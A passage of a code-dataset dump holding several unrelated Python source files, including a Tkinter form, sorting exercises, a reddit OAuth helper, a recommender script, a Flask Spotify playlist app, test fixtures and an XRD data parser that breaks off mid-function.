Name\",width=15,font=(\"Bold\",10))\r\nl2.place(x=68,y=180)\r\n\r\ne2=Entry(root)\r\ne2.place(x=240,y=180)\r\n\r\nl3=Label(root,text=\"Gender\",width=15,font=(\"Bold\",10))\r\nl3.place(x=58,y=230)\r\nRadiobutton(root,text= \"Male\",variable= var,value=1,padx=15).place(x=235,y=230)\r\nRadiobutton(root,text= \"Female\",variable= var,value=2,padx=20).place(x=300,y=230)\r\n\r\nl4=Label(root,text=\"Subject\",width=15,font=(\"Bold\",10))\r\nl4.place(x=55,y=300)\r\n\r\n#var1 = IntVar()\r\nCheckbutton(root,text=\"python\",variable=var).place(x=235,y=300)\r\n#var2 = IntVar()\r\nCheckbutton(root,text=\"java\",variable=var).place(x=315,y=300)\r\n#var3=IntVar()\r\nCheckbutton(root,text=\"C++\",variable=var).place(x=235,y=325)\r\n#var4=IntVar()\r\nCheckbutton(root,text=\"Linux\",variable=var).place(x=315,y=330)\r\nButton(root, text='Submit',width=20,bg='brown',fg='white').place(x=230,y=400)\r\n\r\nroot.mainloop()\r\n\r\n\r\n","sub_path":"AllButton(Adminssion Form).py","file_name":"AllButton(Adminssion Form).py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"319830819","text":"# TO-DO: Complete the selection_sort() function below\ndef selection_sort(arr):\n\n for i in range(0, len(arr) - 1):\n cur_index = i\n smallest_index = cur_index\n for j in range(i+1, len(arr)):\n if arr[j] < arr[i] and arr[j] < arr[smallest_index]:\n arr[cur_index], arr[j] = arr[j], arr[cur_index]\n j += 1\n\n return arr\n\n\n# print(selection_sort(arr))\n\n\n# TO-DO: implement the Bubble Sort function below\ndef bubble_sort(arr):\n arr_end = len(arr)-1\n # * Each iteration moves the largest accessible value to the end, so i=2 will move the second largest number to the second-to-last index. That means the end of the loop can decrement after each iteration.\n for i in range(0, arr_end):\n j = 0\n # * The inner loop, in turn, only needs to run while j is less than the latest 'ending' index. This keeps the loop from needing to check the entire array\n while j < arr_end:\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n j += 1\n arr_end -= 1\n i += 1\n return arr\n\n\n# STRETCH: implement the Count Sort function below\ndef count_sort(arr, maximum=-1):\n\n return arr\n","sub_path":"src/iterative_sorting/iterative_sorting.py","file_name":"iterative_sorting.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583765841","text":"import os\nimport time\nimport uuid\n\nimport praw\nfrom tornado import gen, ioloop, web, httpserver\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom . import config\nfrom .curses_helpers import show_notification\nfrom .helpers import check_browser_display, open_browser\n\n__all__ = ['OAuthTool']\n\noauth_state = None\noauth_code = None\noauth_error = None\n\ntemplate_path = os.path.join(os.path.dirname(__file__), 'templates')\n\n\nclass AuthHandler(web.RequestHandler):\n\n def get(self):\n global oauth_state, oauth_code, oauth_error\n\n oauth_state = self.get_argument('state', default='placeholder')\n oauth_code = self.get_argument('code', default='placeholder')\n oauth_error = self.get_argument('error', default='placeholder')\n\n self.render('index.html', state=oauth_state, code=oauth_code,\n error=oauth_error)\n\n # Stop IOLoop if using a background browser such as firefox\n if check_browser_display():\n ioloop.IOLoop.current().stop()\n\n\nclass OAuthTool(object):\n\n def __init__(self, reddit, stdscr=None, loader=None):\n\n self.reddit = reddit\n self.stdscr = stdscr\n self.loader = loader\n self.http_server = None\n\n self.refresh_token = config.load_refresh_token()\n\n # Initialize Tornado webapp\n routes = [('/', AuthHandler)]\n self.callback_app = web.Application(routes,\n template_path=template_path)\n\n self.reddit.set_oauth_app_info(config.oauth_client_id,\n config.oauth_client_secret,\n config.oauth_redirect_uri)\n\n # Reddit's mobile website works better on terminal browsers\n if not check_browser_display():\n if '.compact' not in self.reddit.config.API_PATHS['authorize']:\n self.reddit.config.API_PATHS['authorize'] += '.compact'\n\n def authorize(self):\n\n # If we already have a token, request new access credentials\n if self.refresh_token:\n with self.loader(message='Logging in'):\n self.reddit.refresh_access_information(self.refresh_token)\n return\n\n # Start the authorization callback server\n if self.http_server is None:\n self.http_server = httpserver.HTTPServer(self.callback_app)\n self.http_server.listen(config.oauth_redirect_port)\n\n hex_uuid = uuid.uuid4().hex\n authorize_url = self.reddit.get_authorize_url(\n hex_uuid, scope=config.oauth_scope, refreshable=True)\n\n # Open the browser and wait for the user to authorize the app\n if check_browser_display():\n with self.loader(message='Waiting for authorization'):\n open_browser(authorize_url)\n ioloop.IOLoop.current().start()\n else:\n with self.loader(delay=0, message='Redirecting to reddit'):\n # Provide user feedback\n time.sleep(1)\n ioloop.IOLoop.current().add_callback(self._open_authorize_url,\n authorize_url)\n ioloop.IOLoop.current().start()\n\n if oauth_error == 'access_denied':\n show_notification(self.stdscr, ['Declined access'])\n return\n elif oauth_error != 'placeholder':\n show_notification(self.stdscr, ['Authentication error'])\n return\n elif hex_uuid != oauth_state:\n # Check if UUID matches obtained state.\n # If not, authorization process is compromised.\n show_notification(self.stdscr, ['UUID mismatch'])\n return\n\n try:\n with self.loader(message='Logging in'):\n access_info = self.reddit.get_access_information(oauth_code)\n self.refresh_token = access_info['refresh_token']\n if config.persistent:\n config.save_refresh_token(access_info['refresh_token'])\n except (praw.errors.OAuthAppRequired, praw.errors.OAuthInvalidToken):\n show_notification(self.stdscr, ['Invalid OAuth data'])\n else:\n message = ['Welcome {}!'.format(self.reddit.user.name)]\n show_notification(self.stdscr, message)\n\n def clear_oauth_data(self):\n self.reddit.clear_authentication()\n config.clear_refresh_token()\n self.refresh_token = None\n\n @gen.coroutine\n def _open_authorize_url(self, url):\n with ThreadPoolExecutor(max_workers=1) as executor:\n yield executor.submit(open_browser, url)\n ioloop.IOLoop.current().stop()\n","sub_path":"rtv/oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"240479130","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 23 21:59:24 2019\r\n\r\n@author: Augustine Chukwu\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n#u_cols = ['id', 'name', 'username', 'email', 'short_bio']\r\nusers = pd.read_csv('users.csv',)\r\nprint(\"\\nUser Data :\")\r\nprint(\"shape : \", users.shape)\r\nprint(users.head())\r\n\r\nposts = pd.read_csv('posts.csv')\r\nprint(\"\\nPost Data :\")\r\nprint(\"shape :\", posts.shape)\r\nprint(posts.head())\r\n\r\nfollowing = pd.read_csv('following.csv')\r\nprint(\"\\nFollowing Data :\")\r\nprint(\"shape :\", following.shape)\r\nprint(following.head())\r\n\r\nnotifications = pd.read_csv('notifications.csv')\r\nprint(\"\\nNotifications Data :\")\r\nprint(\"shape :\", notifications.shape)\r\nprint(notifications.head())\r\n\r\nratings = pd.read_csv('rating.csv')\r\nprint(\"\\nRating Data :\")\r\nprint(\"shape :\", ratings.shape)\r\nprint(ratings.head())\r\n\r\n\r\nn_users = ratings.user_id.unique().shape[0]\r\nn_posts = ratings.post_id.unique().shape[0]\r\n\r\ndata_matrix = np.zeros((n_users, n_posts))\r\n\r\nfor line in ratings.itertuples():\r\n data_matrix[line[1]-1, line[2]-1] = line[3]\r\n \r\n#Calculating the similiarity between the two features\r\nfrom sklearn.metrics.pairwise import pairwise_distances\r\nuser_similarity = pairwise_distances(data_matrix, metric='cosnine')\r\npost_similarity = pairwise_distances(data_matrix.T, metric='cosine')\r\n#the above code gives the post similiarities and user similiarites in an array\r\n\r\n#making predictions based on this;we define a funtion\r\ndef predict(rating, similarity, type='user'):\r\n if type == 'user':\r\n mean_user_rating = ratings.mean(axis=1)\r\n \r\n ratings_diff = (ratings - mean_user_rating[:, np.newaxis])\r\n pred = mean_user_rating[:, np.newaxis]+ similarity.dot(ratings_diff) / np.array([np.abs(similarity).sum(axis=1)])\r\n elif type == 'post':\r\n pred = ratings.dot(similarity) / np.array([np.abs(similarity).sum(axis=1)])\r\n return pred\r\n#making predictions\r\nuser_predictions = predict(data_matrix, user_similarity, type='user')\r\npost_prediction = predict(data_matrix, post_similarity, type = 'item')\r\n\r\n ","sub_path":"Recommender_System_1.py","file_name":"Recommender_System_1.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"34932822","text":"import enchant\nimport nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n# from nltk import PorterStemmer\nimport re\n\nDictionary = enchant.Dict(\"en_US\")\n\ndef replaceTwoOrMore(s):\n pattern = re.compile(r\"(.)\\1{1,}\", re.DOTALL)\n return pattern.sub(r\"\\1\\1\", s)\n\ndef getFeatureVector(status):\n featureVector = []\n postag = nltk.pos_tag(status.split())\n words = [x[0] for x in postag if x[1] not in [\"NN\", \"IN\", \"CC\", \"TO\", \"NNS\", \"NNP\", \"NNPS\"]]\n for w in words:\n w = replaceTwoOrMore(w)\n # w = w.strip('\\'\"?,.')\n val = re.search(r\"^[a-zA-Z][a-zA-Z0-9]*$\", w)\n if(val is None):\n continue\n if(Dictionary.check(w) == False):\n continue\n else:\n w = w.lower()\n # w = port.stem(w).encode('ascii')\n # if(w in stopWords):\n # continue\n # if w in featureVector: featureVector[w] += 1\n # else: featureVector[w] = 1\n featureVector.append(w)\n return featureVector\n","sub_path":"gfv.py","file_name":"gfv.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523292189","text":"def DFS(y, x):\n global N, M, islands, island\n island.clear()\n dx = [1, 0, -1, 0]\n dy = [0, 1, 0, -1]\n stack = [(y,x)]\n fieldvisited[y][x] = 1\n island.append((y, x))\n field[y][x] = len(islands)\n while stack:\n vy, vx = stack[-1]\n for i in range(4):\n ny = vy + dy[i]\n nx = vx + dx[i]\n if 0 <= ny < N and 0 <= nx < M and field[ny][nx] > 0 and not fieldvisited[ny][nx]:\n fieldvisited[ny][nx] = 1\n island.append((ny, nx))\n stack.append((ny, nx))\n field[ny][nx] = len(islands)\n break\n else:\n stack.pop()\n islands.append(island[:])\n\ndef cases(arr, start, r):\n for i in range(start, len(arr)-r+1):\n if r == 1:\n yield [arr[i]]\n else:\n for j in cases(arr, i+1, r-1):\n yield [arr[i]] + j\n\ndef min_distance(islands, obj):\n global N, M\n returnval = 1000\n islandval = field[islands[0][0]][islands[0][1]]\n dx = [1, 0, -1, 0]\n dy = [0, 1, 0, -1]\n for island in islands:\n vy, vx = island\n for direc in range(4):\n cnt = 0\n i = j = 1\n if direc == 0 or direc == 2:\n while True:\n nx = vx + i * dx[direc]\n if nx == -1 or nx == M or field[vy][nx] == islandval:\n break\n elif field[vy][nx] > 0:\n if cnt < 2: break\n elif field[vy][nx] != obj: break\n else:\n returnval = min(returnval, cnt)\n cnt += 1\n i += 1\n elif direc == 1 or direc == 3:\n while True:\n ny = vy + j * dy[direc]\n if ny == -1 or ny == N or field[ny][vx] == islandval:\n break\n elif field[ny][vx] > 0:\n if cnt < 2: break\n elif field[ny][vx] != obj: break\n else:\n returnval = min(returnval, cnt)\n cnt += 1\n j += 1\n if returnval == 1000: return -1\n return returnval\n\ndef isvalid(arr, s, visited):\n q = [s]\n while q:\n v = q.pop(0)\n for i in range(1, len(arr)):\n if arr[v][i] and not visited[i]:\n visited[i] = 1\n q.append(i)\n for j in range(1, len(visited)):\n if not visited[j]: return False\n return True\n\ndef BT():\n result = 1000\n edges = []\n for edgecase in cases(range(1, len(islands)), 0, 2):\n edges.append(edgecase)\n # print(edges)\n for caseset in cases(edges, 0, len(islands)-2):\n arr = [[0 for i in range(len(islands))] for j in range(len(islands))]\n for case in caseset:\n s, e = case\n arr[s][e] = 1\n arr[e][s] = 1\n visited = [0 for i in range(len(islands))]\n visited[1] = 1\n if not isvalid(arr, 1, visited): continue\n\n tempval = 0\n for case in caseset:\n vidx, fidx = case # idx of island\n fval = field[islands[fidx][0][0]][islands[fidx][0][1]]\n distance = min_distance(islands[vidx], fval)\n if distance == -1: break\n else:\n tempval += distance\n if tempval >= result: break\n else:\n # print(result)\n # print(caseset)\n result = min(tempval, result)\n\n if result == 1000: return -1\n return result\n\nN, M = map(int, input().split())\nfield = [list(map(int, input().split())) for j in range(N)]\nislands = [0]\nisland = []\n\nfieldvisited = [[0 for i in range(M)] for j in range(N)]\nfor i in range(N):\n for j in range(M):\n if field[i][j] > 0 and not fieldvisited[i][j]:\n DFS(i, j)\n\n# print('======')\nprint(BT())\n# print('======')\n# BT()\n# test=[]\n# for case in cases(range(1,6), 0, 2):\n# test.append(case)\n# print(test)\n# print(min_distance(islands[3], 5))\n# for _ in range(len(field)):\n# print(field[_])\n\n# for case in cases([1,2,3,4,5], 0, 2):\n# print(case)","sub_path":"python/bojprobs/삼성_SW_역량테스트_기출문제/boj17472_2.py","file_name":"boj17472_2.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"21778618","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nimport pickle\nimport tflearn\nimport tensorflow as tf\nfrom tflearn.data_utils import *\nimport re\nfrom builtins import any as b_any\n\ntf.logging.set_verbosity(tf.logging.ERROR)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nID = \"TrumpGen_JG\"\nchar_idx_file = 'char_idx.pickle'\npath = \"./Trump_fix.txt\"\n\nmaxlen = 25\nchar_idx = None\nif os.path.isfile(char_idx_file):\n print('Loading previous char_idx')\n char_idx = pickle.load(open(char_idx_file, 'rb'))\n\nX, Y, char_idx = \\\n textfile_to_semi_redundant_sequences(\n path, seq_maxlen=maxlen, redun_step=1)\npickle.dump(char_idx, open(char_idx_file, 'wb'))\n\n# Instantiating checkpoint finder\ncheckpoint = False\nlist_of_files = os.listdir()\ncheckpoint_type = \".data-00000-of-00001\"\nif b_any(checkpoint_type in x for x in list_of_files):\n checkpoint = True\n\n def extract_number(f):\n s = re.findall(\"(\\d+).data-00000-of-00001\", f)\n return (int(s[0]) if s else -1, f)\n target = (max(list_of_files, key=extract_number))\n target = target.split('.')\n target = target[0]\n\n# Begin Main loop\nwith tf.device('/cpu:0'):\n # Launch tensorboard (This is disabled as it causes Python to crash)\n #os.spawnl(os.P_NOWAIT, \"tensorboard --logdir='/tmp/tflearn_logs/\" + ID + \"'\")\n #os.spawnl(os.P_NOWAIT, \"start \\\"\\\" http://localhost:6006\")\n # Building layers in network\n g = tflearn.input_data([None, maxlen, len(char_idx)])\n g = tflearn.lstm(g, 256, return_seq=True)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.lstm(g, 256, return_seq=True)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.lstm(g, 256)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.fully_connected(g, len(char_idx), activation='softmax')\n g = tflearn.regression(g, optimizer='adam', loss='categorical_crossentropy',\n learning_rate=0.001)\n\n # stating model is to be used in tflearns sequence generator template\n m = tflearn.SequenceGenerator(g, dictionary=char_idx,\n seq_maxlen=maxlen,\n clip_gradients=5.0,\n checkpoint_path='model_trump_Gen',\n max_checkpoints=1)\n # checking if checkpoint\n if checkpoint is True:\n m.load(target)\n\n # Setting up input, with safety check to ensure atleast 25 characters\n foundit = False\n while foundit != True:\n seed = input(\"Give me a seed for the tweet (Give a phrase): \")\n if not seed:\n foundit = True\n seed = random_sequence_from_textfile(path, maxlen)\n else:\n if len(seed) < 24:\n with open(path) as f:\n for line in f:\n if seed in line:\n foundit = True\n line_hold = line.split(seed)\n line_hold = seed + line_hold[1]\n seed = line_hold\n break\n else:\n foundit = True\n if foundit == False:\n print(\"Try again\")\n if len(seed) > 25:\n seed = seed[0:25]\n\n# Create 1 tweet length message\nthe_Trump_file = open('Trumpish_Snippet.txt', 'w')\nprint('One line, coming up')\nTrumping = m.generate(280, temperature=.5,\n seq_seed=seed) # random sentence\nthe_Trump_file.write(\"\\r%s\\n\" % Trumping + '...')\n\n\n# Create 1 page paper\n# the_Trump_file_page = open('Trumpish_Page.txt', 'w')\n# print('One paper, coming up')\n# for i in range(3):\n# seed = random_sequence_from_textfile(path, maxlen)\n# Trumping = m.generate(1000, temperature=.5,\n# seq_seed=seed) # random sentence\n# the_Trump_file_page.write(\"\\r%s\\n\" % Trumping)\n","sub_path":"Just_Generate.py","file_name":"Just_Generate.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"18912699","text":"import argparse\nfrom trainer.util import run_optimizer_process\n\nfrom trainer.Fashion_Trainset_Worker import FashionTrainsetWorker as worker\n# from trainer.MNIST_TRAINSET import MnistTrainsetWorker as worker\n# from trainer.CIFAR_TRAINSET import CifarTrainsetWorker as worker\n\ndef main(job_dir, **args):\n job_dir += '20200412/FASHION/Trainset/'\n methods = ['bohb', 'hyperband', 'randomsearch']\n num_iterations = 5\n experiment_count = 5\n min_budget = 1/128\n max_budget = 1.0\n\n\n # min_budget = 0.0032\n # max_budget = 0.04\n # experiment_count = 1\n # methods = ['bohb']\n # num_iterations = 5\n\n eta = 3\n verbose = True\n for m in methods:\n for _ in range(experiment_count):\n temp_dir = job_dir + 'Run_' + str(_) + '/'\n res_dir = temp_dir + 'Results/'\n work_dir = temp_dir + 'Work/'\n res = run_optimizer_process(method=m,\n run_id=str(_),\n min_budget=min_budget,\n max_budget=max_budget,\n eta=eta,\n verbose=verbose,\n worker=worker,\n res_dir=res_dir + m + '/',\n work_dir=work_dir + m + '/',\n num_iterations=num_iterations)\n print ('\\n'*10)\n print (\"Method: \", m)\n print (\"Experiment Number: \", str(_))\n print ('\\n'*10)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n # Input Arguments\n parser.add_argument(\n '--job-dir',\n help='GCS location to write checkpoints and export models',\n required=True\n )\n args = parser.parse_args()\n arguments = args.__dict__\n print (arguments)\n main(**arguments)\n","sub_path":"gcp/working-gcloud/trainer/run_trainset.py","file_name":"run_trainset.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"26195415","text":"import main as main\nimport urllib3 \nimport urllib.parse as parse\nfrom flask import Flask, request, render_template, make_response, redirect\nfrom flask_cors import CORS, cross_origin\nimport uuid\nfrom cryptography.fernet import Fernet\napp = Flask(__name__)\nCORS(app, resources={r\"/login\": {\"origins\":\"*\"}}, support_credentials=True)\n\nusers = {}\nSECRET = Fernet(Fernet.generate_key())\nTESTING = False\n\n\ndef EncryptToken(string_token):\n byte_token = bytes(string_token, encoding=\"utf-8\")\n encrypted = SECRET.encrypt(byte_token)\n return encrypted\n \n \ndef DecryptToken(byte_token):\n decrypted = SECRET.decrypt(byte_token).decode('utf-8')\n return decrypted\n\n\ndef CreateSession(sid, token):\n users[sid] = EncryptToken(token)\n\n\ndef SetCookie(resp):\n resp.set_cookie(\"sid\", str(uuid.uuid1().int), httponly=True, secure=False, path=\"/\")\n return resp\n\n\ndef IsLoggedIn(request):\n sid = request.cookies.get(\"sid\")\n logged_in = sid in users.keys()\n return logged_in\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef root():\n if IsLoggedIn(request):\n return redirect(\"/dashboard\")\n else:\n return redirect(\"/login\")\n\n\n@app.route(\"/login\", methods=[\"GET\"])\ndef Login(): \n if IsLoggedIn(request):\n return redirect(\"/dashboard\")\n else:\n resp = make_response(render_template(\"login.html\"))\n SetCookie(resp)\n return resp\n \n\n@app.route(\"/dashboard\", methods=[\"GET\"])\ndef Dashboard():\n code = request.args.get(\"code\")\n sid = request.cookies.get(\"sid\")\n \n if code:\n try:\n token = main.GetToken(code)\n except main.spotipy.oauth2.SpotifyOauthError:\n return redirect(\"/login\")\n \n CreateSession(sid, token)\n return redirect(\"/dashboard\")\n else:\n if not IsLoggedIn(request):\n return redirect(\"/login\")\n \n \n resp = make_response(render_template(\"dashboard.html\"))\n return resp\n\n\n@app.route(\"/api/save_liked_songs\", methods=[\"GET\"])\ndef SaveLikedSongsToPlaylist():\n if not IsLoggedIn(request):\n return {\n \"status\": \"error\",\n \"description\": \"INVALID SID\"\n }\n if TESTING:\n print(\"..........SAVING LIKED SONGS TO PLAYLIST..........\")\n else:\n sid = request.cookies.get(\"sid\")\n token = DecryptToken(users[sid])\n sp = main.GetSP(token)\n main.SaveLikedSongsToPlaylist(sp)\n \n return {\"status\": \"ok\"}\n\n\n@app.route(\"/api/create_time_capsule\", methods=[\"GET\"])\ndef CreateTimeCapsule():\n if not IsLoggedIn(request):\n return {\n \"status\": \"error\",\n \"description\": \"INVALID SID\"\n }\n if TESTING:\n print(\"..........CREATING TIME CAPSULE..........\")\n else:\n sid = request.cookies.get(\"sid\")\n token = DecryptToken(users[sid])\n sp = main.GetSP(token)\n main.SavedTracksToPlaylistsByMonth(sp)\n \n return {\"status\": \"ok\"}\n\n\n@app.route(\"/api/save_discover_weekly\", methods=[\"GET\"])\ndef SaveDiscoverWeekly():\n if not IsLoggedIn(request):\n return {\n \"status\": \"error\",\n \"description\": \"INVALID SID\",\n \"error\": \"invalid_sid\"\n }\n if TESTING:\n print(\"..........SAVING DISCOVER WEEKLY..........\")\n resp = {\"status\": \"ok\"}\n return resp\n else:\n sid = request.cookies.get(\"sid\")\n token = DecryptToken(users[sid])\n sp = main.GetSP(token)\n playing_playlist = main.GetCurrentPlayingPlaylist(sp)\n if playing_playlist == None:\n resp = {\n \"status\": \"error\",\n \"description\": \"This isn't a playlist\",\n \"error\": \"not_playlist\"\n }\n return resp\n playing_playlist_name = playing_playlist[\"name\"] \n print(f\"Playlist name: {playing_playlist_name}\")\n if playing_playlist_name != \"Discover Weekly\":\n resp = {\n \"status\": \"error\",\n \"description\": \"This playlist isn't Discover Weekly!\",\n \"error\": \"not_discover_weekly\"\n }\n else: \n playlist_id = main.GetCurrentPlayingPlaylistID(sp)\n new_playlist_id = main.SaveDiscoverWeekly(sp, playlist_id)\n resp = {\n \"status\": \"ok\",\n \"playlist_url\": f\"https://open.spotify.com/playlist/{new_playlist_id}?si=8998205cd0f54cef\"\n }\n return resp\n\n\ndef TestEncrypting():\n message = \"DOGE TO THE MOON\"\n print(message)\n encrypted = EncryptToken(message)\n print(encrypted)\n print(DecryptToken(encrypted))\n\n\nif __name__ == \"__main__\":\n app.run(threaded=True, port=80)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"221812879","text":"# -*- coding: utf-8 -*-\n# Copyright 2020 The PsiZ Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"keras.layers pytest setup.\"\"\"\n\nimport numpy as np\nimport pytest\nimport tensorflow as tf\n\n\n@pytest.fixture\ndef paired_inputs_v0():\n \"\"\"A minibatch of non-gate inputs.\"\"\"\n # Create a simple batch (batch_size=5).\n\n inputs_0 = tf.constant(\n np.array(\n [\n [0.0, 0.1, 0.2],\n [1.0, 1.1, 1.2],\n [2.0, 2.1, 2.2],\n [3.0, 3.1, 3.2],\n [4.0, 4.1, 4.2]\n ], dtype=np.float32\n )\n )\n\n inputs_1 = tf.constant(\n np.array(\n [\n [5.0, 5.1, 5.2],\n [6.0, 6.1, 6.2],\n [7.0, 7.1, 7.2],\n [8.0, 8.1, 8.2],\n [9.0, 9.1, 9.2]\n ], dtype=np.float32\n )\n )\n\n return [inputs_0, inputs_1]\n\n\n@pytest.fixture\ndef paired_inputs_v1():\n \"\"\"A minibatch of embedding coordinate inputs.\"\"\"\n # Create a simple batch (batch_size=5).\n\n inputs_0 = tf.constant(\n np.array(\n [\n [0.0, 0.1, 0.2],\n [1.0, 1.1, 1.2],\n [2.0, 2.1, 2.2],\n [3.0, 3.1, 3.2],\n [4.0, 4.1, 4.2]\n ], dtype=np.float32\n )\n )\n\n inputs_1 = tf.constant(\n np.array(\n [\n [1.0, 1.1, 1.2],\n [2.1, 2.2, 2.3],\n [3.2, 3.3, 3.4],\n [4.4, 4.3, 4.2],\n [4.0, 4.1, 4.2]\n ], dtype=np.float32\n )\n )\n\n return [inputs_0, inputs_1]\n\n\n# TODO remove\n@pytest.fixture\ndef pw_inputs_v0():\n \"\"\"A minibatch of non-gate inupts.\"\"\"\n # Create a simple batch (batch_size=5).\n\n inputs_0 = tf.constant(\n np.array(\n [\n [0.0, 0.1, 0.2],\n [1.0, 1.1, 1.2],\n [2.0, 2.1, 2.2],\n [3.0, 3.1, 3.2],\n [4.0, 4.1, 4.2]\n ], dtype=np.float32\n )\n )\n\n inputs_1 = tf.constant(\n np.array(\n [\n [5.0, 5.1, 5.2],\n [6.0, 6.1, 6.2],\n [7.0, 7.1, 7.2],\n [8.0, 8.1, 8.2],\n [9.0, 9.1, 9.2]\n ], dtype=np.float32\n )\n )\n\n inputs = tf.stack([inputs_0, inputs_1], axis=-1)\n return inputs\n\n\n@pytest.fixture\ndef pw_inputs_v1():\n \"\"\"A minibatch of non-gate inupts.\"\"\"\n # Create a simple batch (batch_size=5).\n\n inputs_0 = tf.constant(\n np.array(\n [\n [0.0, 0.1, 0.2],\n [1.0, 1.1, 1.2],\n [2.0, 2.1, 2.2],\n [3.0, 3.1, 3.2],\n [4.0, 4.1, 4.2]\n ], dtype=np.float32\n )\n )\n\n inputs_1 = tf.constant(\n np.array(\n [\n [5.0, 5.1, 5.2],\n [6.0, 6.1, 6.2],\n [7.0, 7.1, 7.2],\n [8.0, 8.1, 8.2],\n [9.0, 9.1, 9.2]\n ], dtype=np.float32\n )\n )\n\n inputs = tf.stack([inputs_0, inputs_1], axis=-1)\n return inputs\n\n\n@pytest.fixture\ndef group_v0():\n \"\"\"A minibatch of group indices.\"\"\"\n # Create a simple batch (batch_size=5).\n group = tf.constant(\n np.array(\n [\n [0, 0, 0],\n [0, 1, 0],\n [0, 2, 0],\n [0, 1, 1],\n [0, 2, 1]\n ], dtype=np.int32\n )\n )\n return group\n\n\n@pytest.fixture\ndef group_3g_empty_v0():\n \"\"\"A minibatch of group indices.\"\"\"\n # Create a simple batch (batch_size=5).\n group = tf.constant(\n np.array(\n [\n [0, 1, 0],\n [0, 1, 0],\n [0, 2, 0],\n [0, 1, 1],\n [0, 2, 1]\n ], dtype=np.int32\n )\n )\n return group\n","sub_path":"tests/keras/layers/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"259610553","text":"import numpy as np\nimport os\nfrom collections import *\n\nchiFileFolder = './basicInfo/chi/'\ndef extractSingleChiFile(chiFileFolder, i, j, startIndex = 1000, endIndex = 3500):\n fileName = str(i) + '_' + str(j) + '_rm.chi'\n chiFileAbsPath = os.path.join(chiFileFolder, fileName)\n TThetaList = []\n intensityList = []\n with open(chiFileAbsPath, 'r') as chiFile:\n count = 0\n for line in chiFile.readlines():\n if (count > 3):\n ttheta, *_, intensity = line.strip().split(' ')\n TThetaList.append(float(ttheta))\n intensityList.append(float(intensity))\n count += 1\n chiDict = {'TTheta':TThetaList[startIndex:endIndex], 'Intensity':intensityList[startIndex:endIndex]}\n return chiDict\ndef extractSingleTxtFile(i, j, startIndex = 1100, endIndex = 1700, txtFileFolder='./basicInfo/chi/chi2txt/afterCalibrated', ):\n# def extractSingleTxtFile(i, j, startIndex = 1100, endIndex = 1700, txtFileFolder='./basicInfo/chi/chi2txt/afterCalibrated/smoothed', ):\n fileName = str(i) + '_' + str(j) + '_rm.txt'\n # fileName = str(i) + '_' + str(j) + '_rm_SG_RM.txt'\n txtFileAbsPath = os.path.join(txtFileFolder, fileName)\n TThetaList = []\n intensityList = []\n with open(txtFileAbsPath, 'r') as file:\n for line in file.readlines():\n ttheta, intensity = line.strip().split(' ')\n TThetaList.append(float(ttheta))\n intensityList.append(float(intensity))\n txtDict = {'TTheta':TThetaList[startIndex:endIndex], 'Intensity':intensityList[startIndex:endIndex]}\n return txtDict\ndef filterLocalMaxmum(yDeque, selYDeque):\n y = deque()\n for selY in selYDeque:\n index = yDeque.index(selY)\n if yDeque[index] > yDeque[index - 1]:\n y.append(selY)\n return y\ndef getRelativeHeight(yDeque, selYDeque):\n relativeHeightDeque = deque()\n for selY in selYDeque:\n index = yDeque.index(selY)\n topVal = yDeque[index]\n bottomVal = 0\n cond = True\n while cond:\n if (yDeque[index-1] <= yDeque[index]) and (index >= 1):\n index -= 1\n else:\n bottomVal = yDeque[index]\n cond = False\n relativeHeightDeque.append(topVal - bottomVal)\n return relativeHeightDeque\ndef findPeaks(i, j, startIndex = 350, endIndex = 1000, initialHeight = 50, peaksNum = 12):\n txtDict = extractSingleTxtFile(i, j, startIndex, endIndex)\n TThetaDeque = deque(txtDict['TTheta'])\n IntensityDeque = deque(txtDict['Intensity'])\n\n selIntensityDeque = deque()\n for i in range(1, len(IntensityDeque) - 1):\n r = (IntensityDeque[i] - IntensityDeque[i-1]) * (IntensityDeque[i] - IntensityDeque[i+1])\n if (r > 0):\n 